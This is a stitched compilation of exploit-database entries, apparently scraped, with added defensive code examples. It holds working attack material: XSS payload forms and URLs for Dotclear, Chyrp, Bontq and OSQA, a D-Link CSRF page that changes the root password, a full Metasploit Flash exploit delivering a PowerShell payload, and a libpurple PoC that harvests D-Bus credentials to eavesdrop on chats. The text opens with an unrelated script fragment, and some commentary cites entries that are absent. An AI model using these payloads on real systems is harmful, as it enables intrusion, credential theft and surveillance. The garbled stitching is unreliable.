    dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
    mainloop = gobject.MainLoop()
    bus = dbus.SystemBus()

    nm = NetworkManager()

    if len(args) == 0:
        #mainloop.run()
        True
    elif args[0] == 'new':
        conn = {
            'connection': {
                'permissions': [ 'user:joesix:' ],
                'autoconnect': False,
                'type': '802-11-wireless',
            },
            '802-11-wireless': {
                #'ssid': [ dbus.Byte(ord(c)) for c in "something" ],
                'mode': 'infrastructure',
                'security': '802-11-wireless-security',
            },
            '802-1x': {
                'eap': [ 'tls' ], # peap, ttls
                'client-cert': [ dbus.Byte(ord(c)) for c in 'file:///home/foo/certs/cert.pem' ] + [ dbus.Byte(0) ],
                'private-key': [ dbus.Byte(ord(c)) for c in 'file:///home/foo/certs/key.pem' ] + [ dbus.Byte(0) ],
                'ca-cert': [ dbus.Byte(ord(c)) for c in 'file:///home/foo/certs/cacert.pem' ] + [ dbus.Byte(0) ],
                'private-key-password': "12345",
                #'ca-cert': 'hash://server/sha256/5336d308fa263f9f07325baae58ac972876f419527a9bf67c5ede3e668d3a925',
                #'subject-match': '/CN=blah/emailAddress=foo@bar',
                #'phase2-auth': 'mschapv2',
                'identity': 'test1',
                #'password': 'test1',
            },
            '802-11-wireless-security': {
                'key-mgmt': 'wpa-eap',
                'auth-alg': 'open',
            },
        }
        dev = args[1]
        ap = '/'  # addcon() indexes ap[0], so default to '/' rather than None
        if len(args) > 2:
            ap = args[2]
        nm.addcon(conn, dev, ap)

# vim: sw=4 ts=8 noet
HireHackking
source: https://www.securityfocus.com/bid/52221/info

Dotclear is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Dotclear 2.4.1.2 is vulnerable; prior versions may also be affected.

<form action="http://www.example.com/admin/auth.php" method="post">
<input type="hidden" name="new_pwd" value="1" />
<input type="hidden" name="new_pwd_c" value="2" />
<input type="hidden" name="login_data" value='"><script>alert(document.cookie);</script>' />
<input type="submit" id="btn">
</form>
HireHackking
source: https://www.securityfocus.com/bid/52221/info

Dotclear is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Dotclear 2.4.1.2 is vulnerable; prior versions may also be affected.

http://www.example.com/admin/comments.php?type=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/admin/comments.php?sortby=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/admin/comments.php?order=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/admin/comments.php?status=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
HireHackking
source: https://www.securityfocus.com/bid/52113/info

Dolibarr is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks.

Dolibarr 3.2.0 Alpha is vulnerable; other versions may also be affected.

http://www.example.com/document.php?modulepart=project&file=../[FILE INCLUDE VULNERABILITY!]
HireHackking

Chyrp 2.1.2 - '/includes/error.php?body' Cross-Site Scripting

source: https://www.securityfocus.com/bid/52117/info

Chyrp is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.

Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.

Chyrp 2.1.2 is vulnerable; other versions may also be affected.

<form action="http://[host]/includes/error.php" method="post">
<input type="hidden" name="ajax" value="1" />
<input type="hidden" name="body" value='<script>alert(document.cookie);</script>' />
<input type="submit" id="btn">
</form>
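The cross-site scripting and HTML-injection posts above (Dragonfly, ContentLion, Oxwall, Webglimpse, Dotclear, Chyrp and the Xavi router) share two traits worth handling on the defending side: the probes arrive percent-encoded, sometimes twice (the Xavi context parameter carries %2522%253e%253c, which only becomes `"><` after a second decode), and they vary the case of `script` to slip past naive filters. The following is an added example, not code from any of the advisories or products, showing the two controls together: a log scanner that decodes query values until they stop changing and then looks for script markers, and an output-encoding helper for the moment a parameter is reflected into HTML. The log lines are constructed to resemble the URLs quoted above; client addresses and timestamps are placeholders.

```python
import html
import re
from urllib.parse import unquote, unquote_plus, urlsplit

# Constructed access-log lines modelled on the probe URLs quoted in the posts above.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Feb/2012:10:00:01 +0000] "GET /index.php?option=com_osproperty&task=ajax_loadStateInListPage&country_id=31 HTTP/1.1" 200 512
10.0.0.6 - - [27/Feb/2012:10:00:02 +0000] "GET /ow_updates/?plugin=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28982087%29%3C%2fScRiPt%3E HTTP/1.1" 200 1024
10.0.0.7 - - [27/Feb/2012:10:00:03 +0000] "GET /webconfig/wan/confirm.html/confirm?context=pageAction%3Dadd%26pvcName%3D%2522%253e%253c%252ftd%253e%253cscript%253ealert%28document.cookie%29%253c%252fscript%253e HTTP/1.1" 200 2048
10.0.0.8 - - [27/Feb/2012:10:00:04 +0000] "GET /admin/comments.php?sortby=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Script-injection markers; case-insensitive so sCrIpT / ScRiPt casing does not evade it.
XSS_MARKERS = re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.IGNORECASE)


def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing, so double encoding is unwrapped."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def split_query(query):
    """Split a raw query string on '&' only (no ';' splitting), decoding each part once."""
    pairs = []
    for chunk in query.split("&"):
        if not chunk:
            continue
        name, _, value = chunk.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def suspicious_params(request_target):
    """Return [(param, decoded_value)] for query parameters that carry script markers."""
    hits = []
    for name, value in split_query(urlsplit(request_target).query):
        decoded = fully_decode(value)
        if XSS_MARKERS.search(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(text):
    """Return [(client_ip, [flagged parameter names])] for requests carrying probes."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = suspicious_params(m.group(1))
        if hits:
            findings.append((line.split()[0], [name for name, _ in hits]))
    return findings


def render_param(value):
    """Reflect a request parameter into an HTML text node with the right encoding applied."""
    return "<p>Sort order: %s</p>" % html.escape(value, quote=True)


if __name__ == "__main__":
    for ip, params in scan_log(SAMPLE_LOG):
        print(ip, "probed", ", ".join(params))
    print(render_param('"><script>alert(document.cookie);</script>'))
```

The scanner is a triage aid, not a filter: the fix for the reflected parameter is the encoding step in render_param (and its attribute, URL and JavaScript-context equivalents), because that step holds regardless of how the input was encoded or cased on the way in.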
HireHackking

D-Link DCS - 'security.cgi' Cross-Site Request Forgery

source: https://www.securityfocus.com/bid/52134/info

The D-Link DCS-900, DCS-2000, and DCS-5300 are prone to a cross-site request-forgery vulnerability.

Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible.

This issue affects D-Link DCS-900, DCS-2000, and DCS-5300.

<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://www.example.com/setup/security.cgi">
<input type="hidden" name="rootpass" value="your_pass"/>
<input type="hidden" name="confirm" value="your_pass"/>
</form>
</body>
</html>
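The auto-submitting form above works because the device's security.cgi accepts any POST that arrives with the administrator's session cookie, with nothing in the request that only the device's own setup page could have supplied. The following is an added example, not D-Link code, of how a password-change handler can tell the two apart: a per-session token, derived with HMAC so the server need not store it, that the genuine form embeds and a cross-site form cannot read, plus an Origin/Referer host check as a second line. The secret, session id, host name and form field names are constructed for the demonstration (rootpass and confirm follow the advisory's form).

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed per-deployment secret; a real device would generate it once at
# provisioning time and persist it, not regenerate it per process.
SERVER_SECRET = secrets.token_bytes(32)
OWN_HOST = "www.example.com"  # host the admin interface is served from (constructed)


def issue_csrf_token(session_id):
    """Token the setup page embeds in its form; bound to the session by HMAC."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id, presented):
    expected = issue_csrf_token(session_id)
    return hmac.compare_digest(expected, presented or "")


def origin_allowed(headers):
    """Secondary check: a form posted from another site carries that site's Origin."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    return (urlsplit(source).hostname or "").lower() == OWN_HOST


def handle_security_cgi(session_id, headers, body):
    """Return (status, message) for a POST to the password-change handler."""
    if not origin_allowed(headers):
        return 403, "cross-site request refused"
    form = parse_qs(body, keep_blank_values=True)
    token = form.get("csrf_token", [""])[0]
    if not verify_csrf_token(session_id, token):
        return 403, "missing or invalid CSRF token"
    new_pw = form.get("rootpass", [""])[0]
    if not new_pw or new_pw != form.get("confirm", [""])[0]:
        return 400, "password fields missing or do not match"
    return 200, "password updated"


def demo():
    """Return the status codes given to a forged request and to a genuine one."""
    session = "sess-0123"  # constructed session identifier
    # What the advisory's page sends: the victim's cookie rides along, but the
    # request carries the attacker page's Origin and no token.
    forged = handle_security_cgi(
        session,
        {"Origin": "http://attacker.example", "Cookie": "sid=" + session},
        "rootpass=your_pass&confirm=your_pass")
    # What the device's own setup page sends.
    genuine = handle_security_cgi(
        session,
        {"Origin": "http://" + OWN_HOST, "Cookie": "sid=" + session},
        "rootpass=n3w-pass&confirm=n3w-pass&csrf_token=" + issue_csrf_token(session))
    return forged[0], genuine[0]


if __name__ == "__main__":
    print(demo())
```

The token is the primary control; the Origin check is kept because it is cheap and catches the common case even when a page forgets to embed the token, but some clients omit both Origin and Referer, so a deployment that relies on it alone will either lock those clients out or wave them through. Marking the session cookie SameSite=Lax or Strict removes the cookie from cross-site POSTs in modern browsers and complements both checks.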
HireHackking
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory',
      'Description'    => %q{
        This module exploits an uninitialized memory vulnerability in Adobe Flash Player. The
        vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails to
        initialize allocated memory. When using a correct memory layout this vulnerability leads
        to a ByteArray object corruption, which can be abused to access and corrupt memory. This
        module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash
        15.0.0.189.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Nicolas Joly', # Vulnerability discovery
          'Unknown',      # Exploit in the wild
          'juan vazquez'  # msf module
        ],
      'References'     =>
        [
          ['CVE', '2014-8440'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-24.html'],
          ['URL', 'http://malware.dontneedcoffee.com/2014/11/cve-2014-8440.html'],
          ['URL', 'http://www.verisigninc.com/en_US/cyber-security/security-intelligence/vulnerability-reports/articles/index.xhtml?id=1081']
        ],
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => OperatingSystems::Match::WINDOWS_7,
          :ua_name => Msf::HttpClients::IE,
          :flash   => lambda { |ver| ver =~ /^15\./ && ver <= '15.0.0.189' },
          :arch    => ARCH_X86
        },
      'Targets'        =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Nov 11 2014',
      'DefaultTarget'  => 0))
  end

  def exploit
    @swf = create_swf
    super
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
    b64_payload = Rex::Text.encode_base64(psh_payload)

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-8440', 'msf.swf')
    swf = ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end

end
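The landing page the module serves has a recognisable shape: a 1x1 Flash object whose FlashVars carry a base64 blob (`sh=...`) that decodes to a PowerShell command line. The following is an added example of a defender-side check for that shape, written here for this page; it is not part of the Metasploit module and uses only the Python standard library. The placeholder command line and the two HTML documents are constructed for the demonstration.

```python
import base64
import re
from html.parser import HTMLParser

FLASH_MIME = "application/x-shockwave-flash"
POWERSHELL_RE = re.compile(r"powershell(?:\.exe)?", re.IGNORECASE)


class FlashVarsCollector(HTMLParser):
    """Collects FlashVars strings and notes 1x1 Flash objects/embeds."""

    def __init__(self):
        super().__init__()
        self.flashvars = []
        self.tiny_flash = False  # a 1x1 Flash movie is itself a red flag

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "param" and a.get("name", "").lower() == "flashvars":
            self.flashvars.append(a.get("value", ""))
        elif tag == "embed":
            if "flashvars" in a:
                self.flashvars.append(a["flashvars"])
            if a.get("type", "").lower() == FLASH_MIME and (a.get("width"), a.get("height")) == ("1", "1"):
                self.tiny_flash = True
        elif tag == "object" and (a.get("width"), a.get("height")) == ("1", "1"):
            self.tiny_flash = True


def split_flashvars(fv):
    """Split 'k=v&k2=v2' without percent-decoding, so base64 '+' and '=' survive."""
    pairs = []
    for part in fv.split("&"):
        if "=" in part:
            pairs.append(tuple(part.split("=", 1)))
    return pairs


def decode_b64_loose(blob):
    """Base64-decode a blob that may lack padding; '' if it is not base64 at all."""
    blob = re.sub(r"\s+", "", blob)
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""
    return raw.decode("utf-8", errors="ignore")


def inspect_landing_page(html_text):
    """Flag pages that hand a PowerShell command line to a 1x1 SWF through FlashVars."""
    parser = FlashVarsCollector()
    parser.feed(html_text)
    findings = {"tiny_flash": parser.tiny_flash, "powershell_in_flashvars": False, "decoded": []}
    for fv in parser.flashvars:
        for key, value in split_flashvars(fv):
            text = decode_b64_loose(value)
            if POWERSHELL_RE.search(text):
                findings["powershell_in_flashvars"] = True
                findings["decoded"].append((key, text))
    return findings


# Constructed samples: a harmless placeholder stands in for the module's generated
# PowerShell stager, and SAMPLE_HTML mirrors the shape of the module's template.
SAMPLE_CMD = "powershell.exe -NoProfile -WindowStyle Hidden -Command Write-Output placeholder"
SAMPLE_B64 = base64.b64encode(SAMPLE_CMD.encode()).decode()
SAMPLE_HTML = (
    '<html><body>'
    '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1" />'
    '<param name="movie" value="qwerty.swf" />'
    '<param name="allowScriptAccess" value="always" />'
    '<param name="FlashVars" value="sh=%s" />'
    '<embed type="application/x-shockwave-flash" width="1" height="1" src="qwerty.swf" '
    'allowScriptAccess="always" FlashVars="sh=%s" Play="true"/>'
    '</object></body></html>'
) % (SAMPLE_B64, SAMPLE_B64)

# Constructed benign page: a normal-sized player with ordinary FlashVars.
BENIGN_HTML = (
    '<html><body><embed type="application/x-shockwave-flash" width="640" height="480" '
    'src="player.swf" FlashVars="autoplay=1&amp;lang=en"/></body></html>'
)

if __name__ == "__main__":
    print(inspect_landing_page(SAMPLE_HTML))
    print(inspect_landing_page(BENIGN_HTML))
```

The FlashVars string is split by hand rather than with `urllib.parse.parse_qs`, because the latter would turn the `+` characters of standard base64 into spaces and break the decode. Either the 1x1 movie or the decoded PowerShell is enough to warrant a closer look at the SWF that the same page references.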

MyJobList 0.1.3 - 'eid' SQL Injection

source: https://www.securityfocus.com/bid/52168/info

MyJobList is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

MyJobList 0.1.3 is vulnerable; other versions may also be affected.

http://www.example.com/?loc=profile&eid=[SQLi]
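The advisory names the parameter (`eid`) but not the code behind it. As an added illustration, not MyJobList's own code, here is a profile lookup written the way an injectable handler typically is (the raw parameter formatted into the SQL text) next to the hardened form (shape validation plus a bound parameter). SQLite stands in for the application's database; the table, rows and the tampered value are constructed for the example.

```python
import re
import sqlite3

EID_RE = re.compile(r"[0-9]+")       # the only shape a profile id may take
SQLITE_INT_MAX = 2**63 - 1           # larger values cannot be bound as INTEGER
TAMPERED = "0 OR 1=1"                # constructed stand-in for "[SQLi]"


def make_db():
    """Constructed stand-in for the application's employee table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE employees (eid INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    db.executemany(
        "INSERT INTO employees VALUES (?, ?, ?)",
        [(1, "alice", "alice@example.test"), (2, "bob", "bob@example.test"), (3, "carol", "carol@example.test")],
    )
    return db


def profile_vulnerable(db, eid):
    """The pattern the advisory describes: the request parameter is pasted into SQL."""
    sql = "SELECT eid, name, email FROM employees WHERE eid = %s" % eid
    return db.execute(sql).fetchall()


def profile_hardened(db, eid):
    """Whitelist the parameter's shape, then bind it; the value never touches the SQL text."""
    if not isinstance(eid, str) or not EID_RE.fullmatch(eid):
        raise ValueError("eid must be a decimal integer")
    eid_int = int(eid)
    if eid_int > SQLITE_INT_MAX:
        raise ValueError("eid out of range")
    return db.execute("SELECT eid, name, email FROM employees WHERE eid = ?", (eid_int,)).fetchall()


def hardened_rejects(db, eid):
    """True when the hardened handler refuses the value instead of querying with it."""
    try:
        profile_hardened(db, eid)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, eid=2        ->", profile_vulnerable(db, "2"))
    print("vulnerable, eid tampered ->", profile_vulnerable(db, TAMPERED))   # every row
    print("hardened,   eid=2        ->", profile_hardened(db, "2"))
    print("hardened,   eid tampered ->", "rejected" if hardened_rejects(db, TAMPERED) else "accepted")
```

The binding alone would already stop the injection; the shape check in front of it is what turns a tampered `eid` into a logged 4xx rather than a silent empty result, which is the signal a detection rule can key on.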

libpurple 2.8.10 - OTR Information Disclosure

source: https://www.securityfocus.com/bid/52175/info

libpurple is prone to an information-disclosure vulnerability.

Successful exploits may allow attackers to obtain potentially sensitive information that may aid in other attacks.

The following products are vulnerable:

libpurple versions prior to 2.10.1
pidgin versions prior to 2.10.1
pidgin-otr versions prior to 3.2.0

#!/usr/bin/env python
# PoC for snooping on pidgin discussions (OTR/non-OTR) via dbus
# (see CVE-2012-1257)
#
# requires python-dbus and python-gobject
#
# based on sample code found here:
# http://developer.pidgin.im/wiki/DbusHowto
#
# Disclaimer: There's virtually no error handling here,
# so don't rely on this for any serious work.
#
# Author:
# Dimitris Glynos :: { dimitris at census dash labs dot com }

import dbus, gobject, os, sys
from dbus.mainloop.glib import DBusGMainLoop

# same owner processes get to snoop their respective DBUS credentials
# via /proc/<pid>/environ
def obtain_dbus_session_creds():
    all_pids = [pid for pid in os.listdir('/proc') if pid.isdigit()]
    env_tmpl = '/proc/%s/environ'
    session_creds = {}

    for pid in all_pids:
        if not (os.stat(env_tmpl % pid).st_uid == os.getuid()):
            continue
        if not os.access(env_tmpl % pid, os.R_OK):
            continue
        f = open(env_tmpl % pid, 'rb')
        contents = f.read()
        f.close()
        for var in contents.split('\0'):
            if var.startswith('DBUS_SESSION_BUS_ADDRESS='):
                val = var[var.index('=')+1:]
                if not session_creds.has_key(val):
                    session_creds[val] = 1
    return session_creds

def recvs(account, contact, msg, conversation, flags):
    print "received '%s' from %s" % (msg, contact)

def sends(account, contact, msg, conversation, flags):
    if flags == 1:
        print "sent '%s' to %s" % (msg, contact)

if not os.environ.has_key('DBUS_SESSION_BUS_ADDRESS'):
    creds = obtain_dbus_session_creds()
    if len(creds.keys()) == 0:
        print >> sys.stderr, (
            "error: no dbus session " +
            "credentials could be recovered."
        )
        sys.exit(1)
    if len(creds.keys()) > 1:
        print >> sys.stderr, (
            "error: multiple dbus session " +
            "credentials found!\nPlease rerun with the proper " +
            "DBUS_SESSION_BUS_ADDRESS env variable\n" +
            "Here are the recovered credentials:\n")
        for k in creds.keys():
            print >> sys.stderr, "DBUS_SESSION_BUS_ADDRESS=%s" % k
        sys.exit(1)
    os.environ["DBUS_SESSION_BUS_ADDRESS"] = creds.keys()[0]

dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
bus = dbus.SessionBus()

bus.add_signal_receiver(
    recvs,
    dbus_interface="im.pidgin.purple.PurpleInterface",
    signal_name="ReceivedImMsg"
)

bus.add_signal_receiver(
    sends,
    dbus_interface="im.pidgin.purple.PurpleInterface",
    signal_name="WroteImMsg"
)

mainloop = gobject.MainLoop()
mainloop.run()
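Both the Flash entry and this libpurple entry reduce, for a defender doing inventory, to "is the installed version inside the stated range?". The Metasploit module above answers that for Flash with a regex on the major version followed by a string comparison (`ver <= '15.0.0.189'`), and byte-wise ordering puts `15.0.0.2` after `15.0.0.189`, so a build that is numerically older is judged out of range. The following added example, not code from either advisory or from Metasploit, compares version components numerically and encodes the ranges exactly as this page states them: Flash 15.x up to and including 15.0.0.189 for the module's targeting, and "prior to" 2.10.1 / 3.2.0 for libpurple, pidgin and pidgin-otr. The product names used as dictionary keys are the page's own; the version strings in the test are constructed.

```python
import re

_NUMERIC_PREFIX = re.compile(r"^\d+(?:\.\d+)*")


def parse_version(ver):
    """'15.0.0.189' -> (15, 0, 0, 189); a packaging suffix such as '-1ubuntu2' is ignored."""
    m = _NUMERIC_PREFIX.match(ver.strip())
    if not m:
        raise ValueError("not a dotted version: %r" % ver)
    return tuple(int(p) for p in m.group(0).split("."))


def flash_matches_module_as_strings(ver):
    """The module's rule as written: major-version regex, then a *string* comparison."""
    return bool(re.match(r"^15\.", ver)) and ver <= "15.0.0.189"


def flash_matches_module(ver):
    """The same rule with numeric components, so 15.0.0.2 sorts before 15.0.0.189."""
    v = parse_version(ver)
    return v[0] == 15 and v <= (15, 0, 0, 189)


# CVE-2012-1257 (libpurple advisory above): "prior to" means the fixed version itself is clean.
FIXED_IN = {"libpurple": "2.10.1", "pidgin": "2.10.1", "pidgin-otr": "3.2.0"}


def needs_update(product, ver):
    """True when an installed version is below the fixed version for that product."""
    return parse_version(ver) < parse_version(FIXED_IN[product])


if __name__ == "__main__":
    for v in ("15.0.0.2", "15.0.0.189", "15.0.0.190"):   # constructed inputs
        print(v, "string rule:", flash_matches_module_as_strings(v), "numeric rule:", flash_matches_module(v))
    for product, v in (("pidgin", "2.10.0"), ("pidgin-otr", "3.2.0")):
        print(product, v, "needs update:", needs_update(product, v))
```

The divergence between the two Flash functions is only visible for builds whose last component is shorter than `189`; for the module that means a missed target, for an inventory script it would mean a vulnerable host reported as patched. Version strings from package managers usually carry a distribution suffix, which is why `parse_version` keeps only the leading dotted numeric prefix.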

Bontq - 'user/' URI Cross-Site Scripting

source: https://www.securityfocus.com/bid/52183/info

Bontq is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/user/user/userinfo/id/2%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

http://www.example.com/user/reports/%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

OSQA's CMS - Multiple HTML Injection Vulnerabilities

source: https://www.securityfocus.com/bid/52184/info

OSQA's CMS is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.

OSQA 3b is vulnerable; other versions may also be affected.

http://www.example.com/questions/ask/
In the URL field, enter the following payload:
<img src="<img src=search"/onerror=alert("xss")//">

http://www.example.com/questions/ask/
In the picture field, enter the same payload:
<img src="<img src=search"/onerror=alert("xss")//">
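The Bontq and OSQA entries above are the same defect seen from two sides: the Bontq vectors arrive percent-encoded in the request path, the OSQA vector is typed into a form field, and in both cases the value is reflected without output encoding. The following added example, not code from either advisory, shows the two things a defender wants for both: a request-path decoder with a marker check that recognises the Bontq and OSQA payloads in web-server logs, and the output encoding that would have neutralised them. The access-log lines are constructed from the payloads shown on this page; the log format and the `title` query parameter are assumptions for the example.

```python
import html
import re
from urllib.parse import unquote

# Markers that identify script-bearing input once it has been percent-decoded.
XSS_MARKERS = re.compile(
    r"<\s*/?\s*script\b"               # <script ...> or </script>
    r"|(?:^|[\s\"'/])on[a-z]+\s*="     # inline handlers: onerror=, onload= (after space, quote or slash)
    r"|\balert\s*\("                   # the canary both advisories use
    r"|javascript\s*:",
    re.IGNORECASE,
)

# Assumed common-log-format line; the first capture is the request target, the second the status.
_LOG_LINE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def decode_request_path(path, rounds=3):
    """Percent-decode until the value stops changing, so double encoding is unwrapped too."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def looks_like_xss(value):
    """True when the decoded value carries one of the script markers above."""
    return bool(XSS_MARKERS.search(decode_request_path(value)))


def render_safe(user_value):
    """Output encoding, the step both applications skipped: user text becomes inert HTML text."""
    return "<span>%s</span>" % html.escape(user_value, quote=True)


def scan_access_log(lines):
    """Return (status, decoded request target) for every line whose target looks like XSS."""
    hits = []
    for line in lines:
        m = _LOG_LINE.match(line)
        if m and looks_like_xss(m.group(1)):
            hits.append((m.group(2), decode_request_path(m.group(1))))
    return hits


# Constructed log lines: the Bontq /user/reports/ vector as published, a benign request,
# a benign request with a parameter that merely contains the letters "on", and the OSQA
# <img ... onerror=...> vector passed as a (constructed) title query parameter.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Feb/2012:10:00:01 +0000] "GET /user/reports/%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E HTTP/1.1" 200',
    '203.0.113.7 - - [24/Feb/2012:10:00:02 +0000] "GET /user/reports/2012 HTTP/1.1" 200',
    '203.0.113.8 - - [24/Feb/2012:10:00:03 +0000] "GET /profile?session=abc&sort=on HTTP/1.1" 200',
    '203.0.113.9 - - [24/Feb/2012:10:00:04 +0000] "GET /questions/ask/?title=%3Cimg%20src%3D%22%3Cimg%20src%3Dsearch%22/onerror%3Dalert(%22xss%22)//%22%3E HTTP/1.1" 200',
]

if __name__ == "__main__":
    for status, target in scan_access_log(SAMPLE_LOG):
        print(status, target)
    print(render_safe('<img src="<img src=search"/onerror=alert("xss")//">'))
```

The event-handler pattern deliberately requires whitespace, a quote or a slash in front of `on...=`, because parameter names such as `session=` would otherwise match; the OSQA payload still matches through its `/onerror=`. Escaping with `quote=True` matters for the Bontq vectors, which break out of an attribute with `"` and `'` before they ever reach a `<`.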